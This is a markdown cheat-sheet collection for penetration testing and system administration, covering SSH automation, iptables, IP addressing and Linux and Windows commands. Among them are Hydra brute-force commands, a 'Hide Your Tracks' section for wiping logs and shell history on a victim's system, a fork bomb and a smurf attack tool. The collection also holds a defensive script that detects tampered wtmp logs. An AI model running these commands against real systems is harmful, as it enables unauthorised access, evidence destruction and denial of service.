├── Collection
│   ├── Automatically run commands over SSH on many servers.md
│   ├── Brute Forcing Services.md
│   ├── CHKCONFIG.md
│   ├── Cisco commands.md
│   ├── Common ports.md
│   ├── DNS.md
│   ├── Exploit Research.md
│   ├── Hidden tools in Command Line.md
│   ├── Hide Your Tracks.md
│   ├── IP Tables.md
│   ├── IPv4.md
│   ├── IPv6.md
│   ├── Kali Linux Commands.md
│   ├── Linux Misc Commands.md
│   ├── Linux Network Commands.md
│   ├── Linux Scripting.md
│   ├── Linux System Info.md
│   ├── Manipulating files.md
│   ├── Metasploit.md
│   ├── Miscellaneous Commands Windows.md
│   ├── Packet Capturing.md
│   ├── Password Cracking.md
│   ├── Powershell.md
│   ├── PsExec.md
│   ├── Running Remote Commands.md
│   ├── SNMP.md
│   ├── Solaris.md
│   ├── Startup Directories.md
│   ├── Terminal Services.md
│   ├── Useful Run Commands.md
│   ├── Using the PHP pfSense Shell.md
│   ├── VPN.md
│   ├── WMIC.md
│   ├── Windows Net_Domain Commands.md
│   ├── Windows Network Commands.md
│   ├── Windows System Info Commands.md
│   ├── Windows Versions.md
│   └── Windows registry.md
├── Literatura.md
└── README.md

/Collection/Automatically run commands over SSH on many servers.md:
--------------------------------------------------------------------------------
# Example [[1]]

Runs one command on every `user@host` listed in `userhost.lst`, one SSH session per host in parallel, and keeps each host's output in its own file.

```sh
tmpdir=${TMPDIR:-/tmp}/pssh.$$
mkdir -p "$tmpdir"
pids=""
while IFS= read -r userhost; do
    # -n: no stdin; BatchMode=yes: fail instead of prompting for a password,
    # so one host without key-based auth cannot hang the whole run
    ssh -n -o BatchMode=yes "$userhost" 'uname -a' > "$tmpdir/$userhost" 2>&1 &
    pids="$pids $!"      # remember every background job so we can wait for it
done < userhost.lst
wait $pids               # block until every ssh has finished
echo "Output for hosts is in $tmpdir"
```

[1]:
--------------------------------------------------------------------------------
/Collection/Brute Forcing Services.md:
--------------------------------------------------------------------------------
# Brute Forcing Services [[2]]

`-l` is a single login name, `-P` a password list, `-f` stops after the first valid pair is found and `-V` prints every attempt. On Kali the wordlist is `/usr/share/wordlists/nmap.lst`.

### Hydra FTP Brute Force

```
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V
```

### Hydra POP3 Brute Force

```
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V
```

### Hydra SMTP Brute Force

Hydra needs a login (`-l`/`-L`) for the smtp module as well:

```
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V
```

[2]:
--------------------------------------------------------------------------------
/Collection/CHKCONFIG.md:
--------------------------------------------------------------------------------
# CHKCONFIG[[3]]
The chkconfig utility is a command-line tool that lets you choose the runlevels in which a selected service starts, and list all available services together with their current settings. Changing a service's setting requires root.

```
$ chkconfig --list                          # List all services and their runlevel settings
$ chkconfig --list service_name             # Display the current settings for one service only
$ chkconfig service_name on                 # Enable a service (runlevels 2, 3, 4 and 5)
$ chkconfig service_name on --level runlevels   # Enable a service in certain runlevels only, e.g. --level 35
$ chkconfig service_name off                # Disable a service
```

[3]:
--------------------------------------------------------------------------------
/Collection/Cisco commands.md:
--------------------------------------------------------------------------------
# Cisco commands

### Exec commands [[4]]

```
<1-99>           # Session number to resume
connect          # Open a terminal connection
disconnect       # Disconnect an existing telnet session
enable           # Turn on privileged commands
exit             # Exit from Exec mode
help             # Description of the interactive help system
lat              # Open a LAT connection
lock             # Lock the terminal
login            # Log in as a particular user
logout           # Exit from Exec mode and log out
menu             # Start a menu-based user interface
mbranch          # Trace multicast route for branch of tree
mrbranch         # Trace reverse multicast route to branch of tree
mtrace           # Trace multicast route to group
name-connection  # Name an existing telnet connection
pad              # Open an X.29 PAD connection
ping             # Send echo messages
resume           # Resume an active telnet connection
show             # Show running system information
systat           # Display information about terminal lines
telnet           # Open a telnet connection
terminal         # Set terminal line parameters
tn3270           # Open a tn3270 connection
trace            # Trace route to destination
where            # List active telnet connections
x3               # Set X.3 parameters on PAD
```

### Common commands [[5]]

```
?                                        # Help
show running-config                      # Show the router, switch or firewall's current (in-RAM) configuration
copy running-config startup-config       # Save the running configuration to NVRAM so it survives a reload
show interface                           # Display the status of the interfaces
show ip interface                        # Configuration and status of IP and its services on all interfaces
configure terminal, enable, interface, router   # Change modes
no shutdown                              # Enable an interface (bring it up)
show ip route                            # Show the routing table
show version                             # Software version, uptime, hardware and the configuration register
debug                                    # Detailed debugging output for a given application, protocol or service
```

[4]:
[5]:
--------------------------------------------------------------------------------
/Collection/Common ports.md:
--------------------------------------------------------------------------------
# Common ports[[6]]

![common-ports-1-638.jpg](https://www.dropbox.com/s/t5xqd8vnlqnftpd/common-ports-1-638.jpg?dl=0&raw=1)

[6]:
--------------------------------------------------------------------------------
/Collection/DNS.md:
--------------------------------------------------------------------------------
# DNS

### dnsrecon Usage Example[[7]]

Scan a domain (`-d example.com`), brute force hostnames from a dictionary (`-D /usr/share/wordlists/dnsmap.txt`), run the standard enumeration (`-t std`) and write the results to XML (`--xml dnsrecon.xml`):

```
dnsrecon -d example.com -D /usr/share/wordlists/dnsmap.txt -t std --xml dnsrecon.xml
```

### Ping scan grepable output [[8]]

`-sn` does host discovery only (no port scan), `-oG -` writes grepable output to stdout and `-iR 5` picks five random Internet addresses as targets, so use this form only where you are authorised to probe arbitrary hosts:

```
# nmap -sn -oG - -iR 5
# Nmap 5.35DC18 scan initiated [time] as: nmap -sn -oG - -iR 5
Host: 93.182.218.153 ()  Status: Up
Host: 154.223.142.85 ()  Status: Down
Host: 120.128.8.97 ()    Status: Down
Host: 47.159.134.149 ()  Status: Down
Host: 24.172.4.19 ()     Status: Down
# Nmap done at [time] -- 5 IP addresses (1 host up) scanned in 4.25 seconds
```

[7]:
[8]:
--------------------------------------------------------------------------------
/Collection/Exploit Research.md:
--------------------------------------------------------------------------------
# Exploit Research [[9]]

```
searchsploit windows 2003 | grep -i local                                  # Search exploit-db for Windows 2003 local privilege escalation exploits
site:exploit-db.com exploit kernel <= 3                                    # Use Google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework/modules/exploits/windows/     # Search Metasploit modules with grep (alternative to msf's search)
```

[9]:
--------------------------------------------------------------------------------
/Collection/Hidden tools in Command Line.md:
--------------------------------------------------------------------------------
# Hidden tools in Command Line[[10]]
NOTICE: You need to run CMD with administrator privileges

### System file checker

```
$ sfc /scannow    # Scan the system immediately and replace protected files as necessary; a restart may be needed if problems are found
$ sfc /scanonce   # Scan at the next restart
$ sfc /scanboot   # Scan at every restart
$ sfc /revert     # Return the System File Checker to its default settings, e.g. to turn off /scanboot
```

### Check disk

```
$ chkdsk Volume    # Check a whole drive: just give the drive letter
$ chkdsk Filename  # Check a single file or a group of files
$ chkdsk /F        # Fix the errors found
$ chkdsk /R        # Locate bad sectors and recover readable information from them. If chkdsk cannot lock the disk (it usually cannot while Windows is using it), it offers to run at the next restart
```

### Cipher

```
$ cipher /W:pathname   # Overwrite the unused space of a volume, erasing data left behind by deleted files. Point it at a whole volume (C:) or a specific folder
```

NOTICE: This applies to traditional hard drives and not SSDs; wear levelling means the overwrite is not guaranteed to hit the cells that held the old data

### Driverquery

```
$ driverquery /s    # Name or IP address of a remote computer whose installed drivers you want to inspect
$ driverquery /si   # Show the digital signature information for drivers
$ driverquery /fo   # Output format (TABLE, LIST, CSV), the option you want when saving a report
```

Example: `driverquery /fo CSV > drivers.csv`

![g91lech9vvrplpbh0qnd.png](https://www.dropbox.com/s/mfgbhgugjic88vq/g91lech9vvrplpbh0qnd.png?dl=0&raw=1)

[10]:
--------------------------------------------------------------------------------
/Collection/Hide Your Tracks.md:
--------------------------------------------------------------------------------
# Hide Your Tracks [[11]]

### Meterpreter

```
$ clearev   # Clear all event logs (Application, System, Security)
```

### Windows machines

- Download [clearlogs.exe]
- Run: `clearlogs.exe -sec`

NOTICE: You will need physical access to the victim's system

### Linux systems

```
$ kwrite /var/log/messages   # Delete all or specific entries
```

NOTICE: You can use any other text editor

### Erasing the Command History

```
$ more ~/.bash_history   # Command history
$ echo $HISTSIZE         # The size of our history
$ export HISTSIZE=0      # Set the history size to zero (takes effect for this shell only)
```

### Shredding the History File

```
$ shred -zu ~/.bash_history   # Overwrite the history file, add a final pass of zeros (-z) and delete it (-u)
```

NOTICE: As the shred man page states, the overwrite is not guaranteed on journaled or copy-on-write filesystems or on SSDs

### The logs[[12]]

- WTMP: every login/logout, with login/logout time plus tty and host
- UTMP: who is online at the moment
- LASTLOG: where each user's last login came from

### Location of logs

- UTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
- WTMP : /etc or /var/adm or /usr/adm or /usr/var/adm or /var/log
- LASTLOG : /usr/var/adm or /usr/adm or /var/adm or /var/log

NOTICE: The location depends on the UNIX distribution

### Shell History

csh/tcsh keep their history in `.history` and run `.logout` on exit; this makes the logout script remove the history and then restore itself:

```
$ mv .logout save.1
$ echo rm .history>.logout
$ echo rm .logout>>.logout
$ echo mv save.1 .logout>>.logout
# Delete .history
```

### Log modifier programs

- ah-1_0b.tar: changes the entries of accounting information
- clear.c: deletes entries in utmp, wtmp, lastlog and wtmpx
- cloak2.c: changes the entries in utmp, wtmp and lastlog
- invisible.c: overwrites utmp, wtmp and lastlog with predefined values
- marryv11.c: edits utmp, wtmp, lastlog and accounting data
- wzap.c: deletes entries in wtmp
- wtmped.c: deletes entries in wtmp
- zap.c: overwrites utmp, wtmp, lastlog - Don't use! Can be detected!
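The reason zap-style cleaners are detectable is that they overwrite a record with NUL bytes instead of removing it, and login/init never write an all-NUL record to wtmp. The following is an added example, not code from the original collection: it parses /var/log/wtmp using the glibc `struct utmp` layout for x86_64 (384-byte records), flags zeroed records, and pairs login/logout records into sessions. The byte string it parses is constructed inside the script rather than read from a host, and the function names are my own.

```python
# Added example, not code from the original collection: parse /var/log/wtmp
# records (glibc struct utmp, x86_64 layout, 384 bytes each) and flag the
# all-NUL records that zap-style log cleaners leave behind.
import struct

# ut_type, pad, ut_pid, ut_line, ut_id, ut_user, ut_host, ut_exit (2 shorts),
# ut_session, ut_tv (sec, usec), ut_addr_v6[4], __unused[20]
UTMP_FMT = "<h2xi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)          # 384 bytes per record
USER_PROCESS, DEAD_PROCESS = 7, 8              # ut_type values from utmp.h


def _cstr(raw):
    """NUL-terminated fixed-width field -> str."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def make_record(rtype, pid, line, user, host, sec):
    """Build one wtmp record; used here only to construct sample data."""
    return struct.pack(UTMP_FMT, rtype, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, sec, 0, 0, 0, 0, 0)


def parse_wtmp(data):
    """Return one dict per complete record; a trailing partial record is ignored."""
    records = []
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        chunk = data[off:off + UTMP_SIZE]
        f = struct.unpack(UTMP_FMT, chunk)
        records.append({
            "type": f[0], "pid": f[1], "line": _cstr(f[2]), "user": _cstr(f[4]),
            "host": _cstr(f[5]), "sec": f[9],
            # login/init always set ut_type and ut_tv; a record that is entirely
            # NUL bytes was overwritten after it was written
            "zapped": chunk == b"\0" * UTMP_SIZE,
        })
    return records


def zapped_offsets(records):
    """Indices of records that look overwritten by a log cleaner."""
    return [i for i, r in enumerate(records) if r["zapped"]]


def sessions(records):
    """Pair each USER_PROCESS with the next DEAD_PROCESS on the same tty."""
    open_by_line, out = {}, []
    for r in records:
        if r["zapped"]:
            continue
        if r["type"] == USER_PROCESS:
            open_by_line[r["line"]] = r
        elif r["type"] == DEAD_PROCESS and r["line"] in open_by_line:
            login = open_by_line.pop(r["line"])
            out.append((login["user"], login["host"], login["sec"], r["sec"]))
    return out


# Constructed sample: two logins with a zeroed record in between them
SAMPLE_WTMP = (
    make_record(USER_PROCESS, 1000, "pts/0", "root", "203.0.113.5", 1700000000)
    + b"\0" * UTMP_SIZE                                   # what zap leaves behind
    + make_record(USER_PROCESS, 1001, "pts/1", "alice", "198.51.100.7", 1700000060)
    + make_record(DEAD_PROCESS, 1000, "pts/0", "", "", 1700000300)
    + make_record(DEAD_PROCESS, 1001, "pts/1", "", "", 1700000400)
)

if __name__ == "__main__":
    recs = parse_wtmp(SAMPLE_WTMP)
    for i in zapped_offsets(recs):
        print(f"record {i} at offset {i * UTMP_SIZE}: all-NUL, probably zapped")
    for user, host, start, end in sessions(recs):
        print(f"{user:<8} {host:<16} {end - start}s")
```

To run it against a real file, pass `open("/var/log/wtmp", "rb").read()` to `parse_wtmp`. The all-NUL heuristic is only meaningful for wtmp: in /var/run/utmp, free slots of type EMPTY are normal. A cleaner that removes a record and rewrites the file (wzap.c, wtmped.c) leaves no NUL hole, so for those you have to compare wtmp against lastlog and the authentication log instead.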
NOTICE: Never delete the logs outright; a missing log file is more conspicuous than an edited one

[11]:
[clearlogs.exe]:
[12]:
--------------------------------------------------------------------------------
/Collection/IP Tables.md:
--------------------------------------------------------------------------------
# IP Tables[[13]]

### Create a set named geoblock

```
$ sudo ipset create geoblock hash:net,port
```

### Loop that adds the listed countries' networks to the set, banning them from reaching sshd

```sh
for IP in $(wget -qO- http://www.ipdeny.com/ipblocks/data/countries/{cn,ru,kr,pk,tw,sg,hk}.zone)
do
    # regular ban: block port 22 for every network in the country zone files
    sudo ipset add geoblock $IP,22
done
```

### Preview of the list

```
# sudo ipset list geoblock
```

### Delete whole list

`ipset del` removes a single entry; to remove the whole set use destroy:

```
# sudo ipset destroy geoblock
```

### Add rules to IPtables

For a `hash:net,port` set the match needs two flags: `src` for the network and `dst` for the port (`--set` is the deprecated spelling of `--match-set`):

```
# sudo iptables -I INPUT -m set --match-set geoblock src,dst -j DROP
```

### Save IPtables

```
# service iptables save
```

### Reverse function

Drop everything that is NOT in the set (an allow-list instead of a block-list):

```
# sudo iptables -A INPUT -m set ! --match-set geoblock src,dst -j DROP
```

### Connection States[[14]]

```
# iptables -A INPUT -p tcp --dport ssh -s 10.10.10.10 -m state --state NEW,ESTABLISHED -j ACCEPT
# iptables -A OUTPUT -p tcp --sport 22 -d 10.10.10.10 -m state --state ESTABLISHED -j ACCEPT
```

### Accept connections by default

```
iptables --policy INPUT ACCEPT
iptables --policy OUTPUT ACCEPT
iptables --policy FORWARD ACCEPT
```

### Red Hat Linux firewall[[15]]

### IPtables Packet Flow Diagram[[16]]

![Iptables.gif](https://www.dropbox.com/s/5gwp8tk1q9hhnr4/Iptables.gif?dl=0&raw=1)

[13]:
[14]:
[15]:
[16]:
--------------------------------------------------------------------------------
/Collection/IPv4.md:
--------------------------------------------------------------------------------
# IPv4

### CLASSFUL IP RANGES [[17]]

```
Class A
  0.  0.  0.  0 = 00000000.00000000.00000000.00000000
127.255.255.255 = 01111111.11111111.11111111.11111111
                  0nnnnnnn.HHHHHHHH.HHHHHHHH.HHHHHHHH

Class B
128.  0.  0.  0 = 10000000.00000000.00000000.00000000
191.255.255.255 = 10111111.11111111.11111111.11111111
                  10nnnnnn.nnnnnnnn.HHHHHHHH.HHHHHHHH

Class C
192.  0.  0.  0 = 11000000.00000000.00000000.00000000
223.255.255.255 = 11011111.11111111.11111111.11111111
                  110nnnnn.nnnnnnnn.nnnnnnnn.HHHHHHHH

Class D
224.  0.  0.  0 = 11100000.00000000.00000000.00000000
239.255.255.255 = 11101111.11111111.11111111.11111111
                  1110XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX

Class E
240.  0.  0.  0 = 11110000.00000000.00000000.00000000
255.255.255.255 = 11111111.11111111.11111111.11111111
                  1111XXXX.XXXXXXXX.XXXXXXXX.XXXXXXXX
```

- n: indicates a bit used for the network ID
- H: indicates a bit used for the host ID
- X: indicates a bit without a specified purpose

### Reserved ranges [[18]]

```
0.0.0.0/8            # "This" network; as a source address it means "this host on this network"
10.0.0.0/8           # Local communications within a private network
100.64.0.0/10        # Shared address space between a service provider and its subscribers behind carrier-grade NAT
127.0.0.0/8          # Loopback addresses to the local host
169.254.0.0/16       # Link-local addresses between two hosts on a single link when no address was assigned, e.g. by DHCP
172.16.0.0/12        # Local communications within a private network
192.0.0.0/24         # IANA IPv4 Special Purpose Address Registry
192.0.2.0/24         # "TEST-NET-1", for documentation and examples; must not be used publicly
192.88.99.0/24       # 6to4 anycast relays (deprecated)
192.168.0.0/16       # Local communications within a private network
198.18.0.0/15        # Benchmark testing of inter-network communications between two separate subnets
198.51.100.0/24      # "TEST-NET-2", for documentation and examples; must not be used publicly
203.0.113.0/24       # "TEST-NET-3", for documentation and examples; must not be used publicly
224.0.0.0/4          # Reserved for multicast
240.0.0.0/4          # Reserved for future use
255.255.255.255/32   # Reserved for the "limited broadcast" destination address
```

### Subnetting [[19]]

![class_a_subnets.jpg](https://www.dropbox.com/s/i7k6anrqrew7q8h/class_a_subnets.jpg?dl=0&raw=1)

### Calculating subnet range [[20]]

```
Address:   192.168.0.1          11000000.10101000.00000000 .00000001
Netmask:   255.255.255.0 = 24   11111111.11111111.11111111 .00000000
Wildcard:  0.0.0.255            00000000.00000000.00000000 .11111111
=>
Network:   192.168.0.0/24       11000000.10101000.00000000 .00000000 (Class C)
Broadcast: 192.168.0.255        11000000.10101000.00000000 .11111111
HostMin:   192.168.0.1          11000000.10101000.00000000 .00000001
HostMax:   192.168.0.254        11000000.10101000.00000000 .11111110
Hosts/Net: 254                  (Private Internet)
```

[17]:
[18]:
[19]:
[20]:
--------------------------------------------------------------------------------
/Collection/IPv6.md:
--------------------------------------------------------------------------------
# IPv6

### Multicast scopes [[21]]

IPv6 has no broadcast; "all nodes" traffic uses multicast with a scope encoded in the address:

```
ff01::   # Interface local: spans only a single interface on a node; useful only for loopback transmission of multicast
ff02::   # Link local: spans the same region as the link-local unicast scope, i.e. all nodes on the same LAN
ff05::   # Site local: intended to span a single site
ff08::   # Organization local: intended to span multiple sites within the same organization
ff0e::   # Global scope, assigned by IANA
```

### Interface addresses [[22]]

```
fe80::/10        # link-local
2000::/3         # global unicast (routable), e.g. 2001:...
::a.b.c.d        # IPv4-compatible IPv6 (deprecated)
::ffff:a.b.c.d   # IPv4-mapped IPv6
```

### THC IPv6 Toolkit [[23]]

```
rsmurf6   # Smurfs the local network of the victim
```

[21]:
[22]:
[23]:
--------------------------------------------------------------------------------
/Collection/Kali Linux Commands.md:
--------------------------------------------------------------------------------
# Kali Linux Commands[[24]]

```
$ apropos      # Search the manual page names and descriptions (man -k)
$ chmod        # Change access permissions
$ chown        # Change file owner and group
$ chroot       # Run a command with a different root directory
$ chkconfig    # System services (runlevel)
$ cksum        # Print CRC checksum and byte counts
$ clear        # Clear terminal screen
$ cmp          # Compare two files
$ comm         # Compare two sorted files line by line
$ command      # Run a command, ignoring shell functions
$ continue     # Resume the next iteration of a loop
$ cp           # Copy one or more files to another location
$ cron         # Daemon to execute scheduled commands
$ crontab      # Schedule a command to run at a later time
$ csplit       # Split a file into context-determined pieces
$ cut          # Divide a file into several parts
$ date         # Display or change the date and time
$ dc           # Desk Calculator
$ dd           # Convert and copy a file, write disk headers, boot records
$ ddrescue     # Data recovery tool
$ declare      # Declare variables and give them attributes
$ df           # Display free disk space
$ diff         # Display the differences between two files
$ diff3        # Show differences among three files
$ dig          # DNS lookup
$ dir          # Briefly list directory contents
$ dircolors    # Colour setup for `ls'
$ dirname      # Convert a full pathname to just a path
$ dirs         # Display list of remembered directories
$ dmesg        # Print kernel & driver messages
$ du           # Estimate file space usage
$ echo         # Display message on screen
$ egrep        # Search files for lines that match an extended expression
$ eject        # Eject removable media
$ enable       # Enable and disable builtin shell commands
$ env          # Environment variables
$ ethtool      # Ethernet card settings
$ eval         # Evaluate several commands/arguments
$ exec         # Execute a command
$ exit         # Exit the shell
$ expect       # Automate arbitrary applications accessed over a terminal
$ expand       # Convert tabs to spaces
$ export       # Set an environment variable
$ expr         # Evaluate expressions
$ false        # Do nothing, unsuccessfully
$ fdformat     # Low-level format a floppy disk
$ fdisk        # Partition table manipulator for Linux
$ fg           # Send job to foreground
$ fgrep        # Search files for lines that match a fixed string
$ file         # Determine file type
$ find         # Search for files that meet a desired criteria
$ fmt          # Reformat paragraph text
$ fold         # Wrap text to fit a specified width
$ for          # Expand words, and execute commands
$ format       # Format disks or tapes
$ free         # Display memory usage
$ fsck         # File system consistency check and repair
$ ftp          # File Transfer Protocol
$ function     # Define Function Macros
$ fuser        # Identify/kill the process that is accessing a file
$ gawk         # Pattern scanning and text processing (find and replace text within files)
$ getopts      # Parse positional parameters
$ grep         # Search files for lines that match a given pattern
$ groupadd     # Add a user security group
$ groupdel     # Delete a group
$ groupmod     # Modify a group
$ groups       # Print group names a user is in
$ gzip         # Compress or decompress named files
$ hash         # Remember the full pathname of a name argument
$ head         # Output the first part of files
$ help         # Display help for a built-in command
$ history      # Command History
$ hostname     # Print or set system name
$ iconv        # Convert the character set of a file
$ id           # Print user and group id's
$ if           # Conditionally perform a command
$ ifconfig     # Configure a network interface
$ ifdown       # Stop a network interface
$ ifup         # Start a network interface up
$ import       # Capture an X server screen and save the image to file
$ install      # Copy files and set attributes
$ jobs         # List active jobs
$ join         # Join lines on a common field
$ kill         # Stop a process from running
$ killall      # Kill processes by name
$ less         # Display output one screen at a time
$ let          # Perform arithmetic on shell variables
$ ln           # Make links between files (-s for a symbolic link)
$ local        # Create variables
$ locate       # Find files
$ logname      # Print current login name
$ logout       # Exit a login shell
$ look         # Display lines beginning with a given string
$ lpc          # Line printer control program
$ lpr          # Off line print
$ lprint       # Print a file
$ lprintd      # Abort a print job
$ lprintq      # List the print queue
$ lprm         # Remove jobs from the print queue
$ ls           # List information about files
$ lsof         # List open files
$ make         # Recompile a group of programs
$ man          # Help manual
$ mkdir        # Create new folders
$ mkfifo       # Make FIFOs (named pipes)
$ mkisofs      # Create a hybrid ISO9660/JOLIET/HFS filesystem
$ mknod        # Make block or character special files
$ more         # Display output one screen at a time
$ mount        # Mount a file system
$ mtools       # Manipulate MS-DOS files
$ mtr          # Network diagnostics (traceroute/ping)
$ mv           # Move or rename files or directories
$ mmv          # Mass Move and rename files
$ netstat      # Networking information
$ nice         # Set the priority of a command or job
$ nl           # Number lines and write files
$ nohup        # Run a command immune to hangups
$ notify-send  # Send desktop notifications
$ nslookup     # Query Internet name servers interactively
$ open         # Open a file in its default application
$ op           # Operator access
$ passwd       # Modify a user password
$ paste        # Merge lines of files
$ pathchk      # Check file name portability
$ ping         # Test a network connection
$ pkill        # Stop processes from running
$ popd         # Restore the previous value of the current directory
$ pr           # Prepare files for printing
$ printcap     # Printer capability database
$ printenv     # Print environment variables
$ printf       # Format and print data
$ ps           # Process status
$ pushd        # Save and then change the current directory
$ pwd          # Print Working Directory
$ quota        # Display disk usage and limits
$ quotacheck   # Scan a file system for disk usage
$ quotactl     # Set disk quotas
$ ram          # ram disk device
$ rcp          # Copy files between two machines
$ read         # Read a line from standard input
$ readarray    # Read from stdin into an array variable
$ readonly     # Mark variables/functions as readonly
$ reboot       # Reboot the system
$ rename       # Rename files
$ renice       # Alter priority of running processes
$ remsync      # Synchronize remote files via email
$ return       # Exit a shell function
$ rev          # Reverse lines of a file
$ rm           # Remove files
$ rmdir        # Remove folders
$ rsync        # Remote file copy (Synchronize file trees)
$ screen       # Multiplex terminal, run remote shells via ssh
$ scp          # Secure copy (remote file copy)
$ sdiff        # Merge two files interactively
$ sed          # Stream Editor
$ select       # Accept keyboard input
$ seq          # Print numeric sequences
$ set          # Manipulate shell variables and functions
$ sftp         # Secure File Transfer Program
$ shift        # Shift positional parameters
$ shopt        # Shell Options
$ shutdown     # Shutdown or restart linux
$ sleep        # Delay for a specified time
$ slocate      # Find files
$ sort         # Sort text files
$ source       # Run commands from a file
$ split        # Split a file into fixed-size pieces
$ ssh          # Secure Shell client (remote login program)
$ strace       # Trace system calls and signals
$ su           # Substitute user identity
$ sudo         # Execute a command as another user
$ sum          # Print a checksum for a file
$ suspend      # Suspend execution of this shell
$ symlink      # Make a new name for a file
$ sync         # Synchronize data on disk with memory
$ tail         # Output the last part of file
$ tar          # Tape Archiver
$ tee          # Redirect output to multiple files
$ test         # Evaluate a conditional expression
$ time         # Measure Program running time
$ times        # User and system times
$ touch        # Change file timestamps
$ top          # List processes running on the system
$ traceroute   # Trace Route to Host
$ trap         # Run a command when a signal is set (bourne)
$ tr           # Translate, squeeze, and/or delete characters
$ true         # Do nothing, successfully
$ tsort        # Topological sort
$ tty          # Print filename of terminal on stdin
$ type         # Describe a command
$ ulimit       # Limit user resources
$ umask        # Users file creation mask
$ umount       # Unmount a device
$ unalias      # Remove an alias
$ uname        # Print system information
$ unexpand     # Convert spaces to tabs
$ uniq         # Uniquify files
$ units        # Convert units from one scale to another
$ unset        # Remove variable or function names
$ unshar       # Unpack shell archive scripts
$ until        # Execute commands (until error)
$ uptime       # Show uptime
$ useradd      # Create new user account
$ usermod      # Modify user account
$ users        # List users currently logged in
$ uuencode     # Encode a binary file
$ uudecode     # Decode a file created by uuencode
$ v            # Verbosely list directory contents (`ls -l -b')
$ vdir         # Verbosely list directory contents (`ls -l -b')
$ vi           # Text Editor
$ vmstat       # Report virtual memory statistics
$ wait         # Wait for a process to complete
$ watch        # Execute/display a program periodically
$ wc           # Print byte, word, and line counts
$ whereis      # Search the user's $PATH, man pages and source files for a program
$ which        # Search the user's $PATH for a program file
$ while        # Execute commands
$ who          # Print all usernames currently logged in
$ whoami       # Print the current user id and name (`id -un')
$ wget         # Retrieve web pages or files via HTTP, HTTPS or FTP
$ write        # Send a message to another user
$ xargs        # Execute utility, passing constructed argument lists
$ xdg-open     # Open a file or URL in the user's preferred application
$ yes          # Print a string until interrupted
```

[24]:
--------------------------------------------------------------------------------
/Collection/Linux Misc Commands.md:
--------------------------------------------------------------------------------
# Linux Misc Commands [[25]]

Search commands

```
$ find -type f | xargs ls -l | cut -c 33- | sort -n     # Search for files, sorted by file size (add -r to sort for reverse order)
$ find -atime +32 -exec mv {} /var/archive/logs \;      # Move files that were last accessed over a month ago
```

RPM commands

```
$ rpm -q -a        # List all installed packages
$ rpm -U -v *.rpm  # Upgrade packages
$ rpm -Fvh *.rpm   # Freshen packages: the one to use when applying the latest fixes
$ for i in `cat `; do if rpm -qpl $i | grep libX >/dev/null; then echo $i; fi; done   # Find which (not installed) rpm file contains the file libX
```

Debian commands

```
$ apt-cache search            # Search for package
$ sudo apt-get install        # Install package from repository
$ sudo dpkg --install         # Install package from local file
$ sudo apt-get update         # Update package lists from repositories
$ sudo apt-get -u upgrade     # Upgrade installed packages to latest version
```

Basic script functions

```
$ for filename in * ; do echo "$filename"; done   # Basic loop to perform something against a number of files (echo "$filename" is the placeholder for the real command; note that echo > $filename would truncate every file)
```

Counting commands

```
$ grep -v -e "^$" filename | wc -l                         # Count the non-empty lines in a file
$ find . -name "*.p?" | xargs grep -v -e "^$" - | wc -l    # Count source code lines (perl)
```

[25]:
--------------------------------------------------------------------------------
/Collection/Linux Network Commands.md:
--------------------------------------------------------------------------------
# Linux network commands [[26]]

General networking commands that help when troubleshooting networks on Linux.

```
$ watch ss -tp                                  # Network connections
$ netstat -ant                                  # TCP connections (-anu for UDP)
$ netstat -tulpn                                # Listening sockets with PIDs
$ lsof -i                                       # Established connections
$ smb://ip/share                                # Access a Windows SMB share (file manager URL)
$ share user x.x.x.x c$                         # Mount Windows share
$ smbclient -U user \\\\ip\\share               # SMB connect
$ ifconfig eth# ip/cidr                         # Set IP and netmask
$ ifconfig eth0:1 ip/cidr                       # Set virtual interface
$ route add default gw gw_ip                    # Set GW
$ ifconfig eth# mtu [size]                      # Change MTU size
$ export MAC=xx:xx:xx:xx:xx:xx                  # Change MAC (step 1)
$ ifconfig int hw ether $MAC                    # Change MAC (step 2)
$ macchanger -m MAC int                         # Backtrack/Kali MAC changer
$ iwlist int scan                               # Built-in wifi scanner
$ dig -x ip                                     # Domain lookup for IP
$ host ip                                       # Domain lookup for IP
$ host -t SRV _service._tcp.url.com             # Domain SRV lookup
$ dig @ip domain -t AXFR                        # DNS zone transfer
$ host -l domain namesvr                        # DNS zone transfer
$ ip xfrm state list                            # Print existing VPN keys
$ ip addr add ip/cidr dev eth0                  # Add a second ('hidden') address to an interface
$ grep DHCP /var/log/messages                   # List DHCP assignments
$ tcpkill host ip and port port                 # Block ip:port
$ echo 1 > /proc/sys/net/ipv4/ip_forward        # Turn on IP forwarding
$ echo "nameserver x.x.x.x" >> /etc/resolv.conf # Add DNS server
```

[26]:
--------------------------------------------------------------------------------
/Collection/Linux Scripting.md:
--------------------------------------------------------------------------------
# Linux scripting

### Understanding bash scripting[[27]]

### Ping sweep without NMAP [[28]]

```
$ for i in `seq 1 255`; do ping -c 1 10.10.10.$i | tr \\n ' ' | awk '/1 received/ {print $2}'; done
$ for i in {1..254}; do ping -c 1 -W 1 10.1.1.$i | grep 'from'; done
```

### Fork bomb[[29]]

```
$ :(){ :|:& };:   # the same thing with readable names: forkbomb(){ forkbomb | forkbomb & }; forkbomb
```

### Monitor DNS[[30]]

Takes the IP address or hostname of the DNS server to check as its first argument and checks the records defined in the `$hosts` array against it.

```php
<?php
// Zabbix external check: prints 1 if every host in $hosts resolves to the
// expected address on the given DNS server, 0 otherwise.
if (isset($argv[1])) {
    $ns_server = $argv[1];
} else {
    echo "You need to supply a DNS server to check. Quitting.\n";
    exit(1);
}
$hosts = array("zabbix.com" => "85.113.250.92",
               "php.net"    => "69.147.83.197");
// Do query
$failed = false;
foreach ($hosts as $host => $ip) {
    // escapeshellarg: the server name comes from the command line, so never
    // let it reach the shell unquoted
    $result = shell_exec("dig +time=1 +tries=1 +short @" . escapeshellarg($ns_server)
                         . " " . escapeshellarg($host));
